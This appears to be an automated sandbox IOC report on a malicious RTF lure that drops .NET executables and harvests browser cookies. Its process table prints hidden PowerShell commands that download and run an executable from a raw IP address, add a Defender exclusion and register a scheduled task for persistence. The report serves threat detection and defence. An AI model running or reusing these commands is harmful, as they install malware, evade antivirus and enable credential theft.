IOC Report

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| Reconfirm The Details.doc | Rich Text Format data, unknown version | initial sample | malicious |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\taskmg[1].exe | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | downloaded | malicious |
| C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT | data | dropped | malicious |
| C:\Users\user\AppData\Local\Temp\tmp3054.tmp | XML 1.0 document, ASCII text | dropped | malicious |
| C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | malicious |
| C:\Users\user\AppData\Roaming\taskmg.exe | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | dropped | malicious |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3263CED7.png | 370 sysV pure executable | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\867A2AEC.wmf | Targa image data - Map - RLE 1569 x 65536 x 0 +2 "\005" | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A2CF84F-B5BA-43C4-A797-10CB765CC9B0}.tmp | Composite Document File V2 Document, Cannot read section info | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4DFB1A07-CB4F-472F-B236-A3BF6A79B957}.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6B5678D1-0902-45B5-A7D8-811025AE74F7}.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C8C94021-4E02-4955-8AF8-3AD414138F04}.tmp | data | dropped | clean |
| C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT:Zone.Identifier | ASCII text, with CRLF line terminators | dropped | clean |
| C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Chrome\Default\Cookies | SQLite 3.x database, last written using SQLite version 3032001 | dropped | clean |
| C:\Users\user\AppData\Roaming\2wi3pnqf.bid\Firefox\Profiles\7xwghk55.default\cookies.sqlite | SQLite 3.x database, user version 7, last written using SQLite version 3017000 | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Reconfirm The Details.LNK | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:56 2021, mtime=Mon Aug 30 20:08:56 2021, atime=Fri Nov 26 01:14:15 2021, length=393215, window=hide | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat | ASCII text, with CRLF line terminators | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex | Little-endian UTF-16 Unicode text, with no line terminators | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms. (copy) | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QOH1SFJ01YDJGSRFKM6L.temp | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SSOY99TCA63S5VSW1UNJ.temp | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SX36BOTN39J9C9J03BTG.temp | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U7TXBSPCBZC5YKNEVYY5.temp | data | dropped | clean |
| C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy) | data | dropped | clean |
| C:\Users\user\Desktop\~$confirm The Details.doc | data | dropped | clean |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' | malicious |
| C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/taskmg.exe','C:\Users\user\AppData\Roaming\taskmg.exe');Start-Process 'C:\Users\user\AppData\Roaming\taskmg.exe' | malicious |
| C:\Users\user\AppData\Roaming\taskmg.exe | "C:\Users\user\AppData\Roaming\taskmg.exe" | malicious |
| C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gZfDBpJYZ.exe | malicious |
| C:\Windows\SysWOW64\schtasks.exe | C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gZfDBpJYZ" /XML "C:\Users\user\AppData\Local\Temp\tmp3054.tmp | malicious |
| C:\Users\user\AppData\Roaming\taskmg.exe | C:\Users\user\AppData\Roaming\taskmg.exe | malicious |
| C:\Windows\System32\notepad.exe | C:\Windows\system32\NOTEPAD.EXE" "C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT | malicious |
| C:\Windows\System32\verclsid.exe | "C:\Windows\system32\verclsid.exe" /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 | clean |

URLs

| Name | IP | Malicious |
|---|---|---|
| httP://173.232.2 | unknown | malicious |
| httP://173.232.204.89/taskmg. | unknown | malicious |